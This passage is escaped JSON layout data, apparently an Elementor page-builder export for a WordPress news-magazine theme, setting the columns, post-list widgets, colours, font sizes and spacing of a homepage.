6\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\